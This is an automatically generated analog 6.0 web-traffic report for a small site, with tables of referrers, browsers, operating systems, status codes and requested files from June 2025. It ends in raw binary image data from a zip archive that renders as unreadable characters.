href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">73</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">13</td><td class="b">21.17%</td><td class="xl">205.169</td></tr> <tr><td class="R">10</td><td class="b">13.09%</td><td class="xl">34</td></tr> <tr><td class="R">10</td><td class="b">16.18%</td><td class="xl">35</td></tr> <tr><td class="R">10</td><td class="b">16.19%</td><td class="xl">54</td></tr> <tr><td class="R">3</td><td class="b"> 2.13%</td><td class="xl">44</td></tr> <tr><td class="R">3</td><td class="b"> 5.11%</td><td class="xl">64.227</td></tr> <tr><td class="R">2</td><td class="b"> 2.00%</td><td class="xl">206.168</td></tr> <tr><td class="R">2</td><td class="b"> 4.11%</td><td class="xl">192.175</td></tr> <tr><td class="R">2</td><td class="b"> 4.10%</td><td class="xl">198.235</td></tr> <tr><td class="R">2</td><td class="b"> 2.00%</td><td class="xl">167.94</td></tr> <tr><td class="R">2</td><td class="b"> 0.21%</td><td class="xl">194.87</td></tr> <tr><td class="R">2</td><td class="b"> 4.11%</td><td class="xl">64.15</td></tr> <tr><td class="R">1</td><td class="b"> 1.00%</td><td class="xl">157.230</td></tr> <tr><td class="R">1</td><td class="b"> 0.14%</td><td class="xl">23</td></tr> <tr><td class="R">1</td><td class="b"> 0.14%</td><td class="xl">16</td></tr> <tr><td class="R">1</td><td class="b"> 0.14%</td><td class="xl">18</td></tr> <tr><td class="R">1</td><td class="b"> 2.05%</td><td class="xl">91</td></tr> <tr><td class="R">1</td><td class="b"> 1.00%</td><td class="xl">57</td></tr> <tr><td class="R">1</td><td class="b"> 1.00%</td><td class="xl">85</td></tr> <tr><td class="R">1</td><td class="b"> 1.00%</td><td class="xl">87</td></tr> <tr><td class="R">4</td><td class="b"> 3.14%</td><td class="xl">[not listed: 4 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">4</td><td class="xl"><a href="http://www.play.peerkinton.com/">http://www.play.peerkinton.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">22</td><td class="xl">http://www.play.peerkinton.com/</td></tr> <tr><td class="R">8</td><td class="xl">http://play.peerkinton.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">3</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0</td></tr> <tr><td class="R">7</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">51</td><td class="P">21</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">51</td><td class="P">21</td><td class="xl"> Safari/537</td></tr> <tr><td class="N">2</td><td class="R">12</td><td class="P">7</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">3</td><td class="P">3</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/29</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/137</td></tr> <tr><td class="N">4</td><td class="R">2</td><td class="P">2</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N"> </td><td class="R">2</td><td class="P">0</td><td class="xl">[not listed: 1 browser]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">24</td><td class="P">12</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">24</td><td class="P">12</td><td class="xl"> Linux</td></tr> <tr><td class="N">2</td><td class="R">16</td><td class="P">9</td><td class="xl">OS unknown</td></tr> <tr><td class="N">3</td><td class="R">18</td><td class="P">8</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">14</td><td class="P">6</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">2</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">4</td><td class="R">12</td><td class="P">4</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">73</td><td class="xl">200 OK</td></tr> <tr><td class="R">4</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">27</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">7</td><td class="b"> 0.91%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">42</td><td class="b">36.21%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">24</td><td class="b">62.88%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">36</td><td class="b">45.44%</td><td class="xl">[directories]</td></tr> <tr><td class="R">16</td><td class="b">34.45%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">7</td><td class="b">14.58%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">7</td><td class="b"> 4.61%</td><td class="xl">.svg</td></tr> <tr><td class="R">7</td><td class="b"> 0.91%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">30</td><td class="b">53.64%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">36</td><td class="b">45.44%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">7</td><td class="b"> 0.91%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">36</td><td class="b">45.44%</td><td class="D">Jun/28/25 4:46 PM</td><td class="xl"><a href="/">/</a></td></tr> <tr><td class="R">37</td><td class="b">54.56%</td><td class="D">Jun/21/25 9:02 PM</td><td class="xl">[not listed: 7 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK HG�[!���� � code.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� ?IDATx���[v�6Pi�Y�w�3���<��S?��� �(��sR�j\��{/��(��#̻z��!�����ݏ�������0/-ևaDy����%�������������������ҧ=��s KO��~df7�1��]��\����wb��3`}}}�^]{��H5����v`����V[]5k�Xfb5Ǫ�Q,m���X]/>���kڂ�X__��"�eV�X���ykނ1��빏�� Xz�*��U���Vz0��Uc'ʱ�z0�Uc'��V{0�Ua'J���6��{!ŊY���;�bEVK4��"WD�XX��5b�v��^�v��+LVt`ma �ֈ��h���ۥb%�6����k0�6�[ܗ`��&�� g�+�`%�6��� �� �2|�&�J5�6��� �U|e%�P��ш#�V��nB�F#�X�(�h�n�6f+݈#V����_g]����6&���Ś ���%ªf�fk� EX�,֤��%ª��X��aURZ�c����s���Ibm �X�>��Kx��8���?P4�/-��db ��� �}��=�v��{�f�7,IJ���`�W����c�7r�����v��v�jjTxQ�; 2m�*ݪ��^�[�I`ɺP��Zs,�2���˧Ƹu����U�����+VZ#V�*˻4n���ȝ]{Db�=o��+RZ#V�����a&i?�V��Ȁ{F2�rG�q�oц�*Kb�H�_g 3+:���W��v,iaɱ�K��W�Wa��(���X�Mǰą`_Z��w!�U|F�䅅`��������D�HNX�}��۔�H�d��nKޅ�ZN��xf�Z����݄��RZ�{-�_���$,�D�W�;����զ�כ� Pc�� �Bk��X�yr��\��,�m���KN�3�r�Y��}��_�r@M��եka9�՝���Y�rh�X���'о Wy#V�¥��B �Z��+|��W����~�>�>? +��aA]b}2M, ����,��ebY�ºŚ��[���{�G�V��|��;�)Y(�|hk/�1~�*��� K��U�}��%8�`���Z��[��19b]����,��.��f}8�V�rLFXn��_��1a��X�cX%�X@X��*wI�X@��X@X�|DZʝ��B, �B, s,�`c}����/�2������\�Ֆ��?F,II�KRR�� K�X �yI+���RR�ZÊCK�{�Z`�K�XyI�!/)b=�%U�B��ߔU�U����bf��e5�u +Zr��#� ſ��X}7>�C!b!b!b!b!b9�]4xJ]�!b!b9�}�p�= ���:8Ŏ,b!!b!��M�Cb!9��{Дۅ�BB, ����G����� �` ��'�"j,%����,%��JJхE,$��� J�]H,$�r�� ��=�Nx�Q$e���_ �w� o� ���"��3���.�b=��J/,b!�b�߇�wa��*����$�uv�߅ ��K���"�ֹ}XA���-� +�ufi�PX�a�k�¤��9ͪ��Jc�7�j�X[Xg5b�E,$i�����.��:���8�M�S��4�6��XI ��7b5�uV-K�uxj�SX��S���%�:ֈ�4��P#VԄ2����� �Xz�VUV2��c�����X;�VUK��v�����c�[�Y��v������U�R�2P'��:��TЉ���������%|Q'���v+���V[A�6[�Q-��t+Vw�fVۊ�^4�Nv�=XmV�j�@��X�돪�.��l7vy-����o�ǒ}�c��������������=Y�Y�'O�� z���_���T-�Xm��X�/{���F��Dn??��"�\V�vճsk7���+�?���h�����ޙ�pg���{j�o͡�ݺ!������>_ zvq{�;�WD��m�[�]ܭ5����Y�W�V�f� �'`Dk;ﵿ��r{�;̰\]̰�[SV�k{s~_���qs"Xn�{bC})7E��T'��,�>b��+��kv_��mnŰ�s�[F��s5b���cu�p�Jgzew�Іý�X��r��S#�c���3[�2�#���k{ �/;ԃÅ�C����o�Z ��ٌ���@���- �u�ő��D>��'��"r�Y��@��X@��X@��X@��X@��X@��X@��X@�aD���Q^Z���D)���XX�(�8��dp2�%�'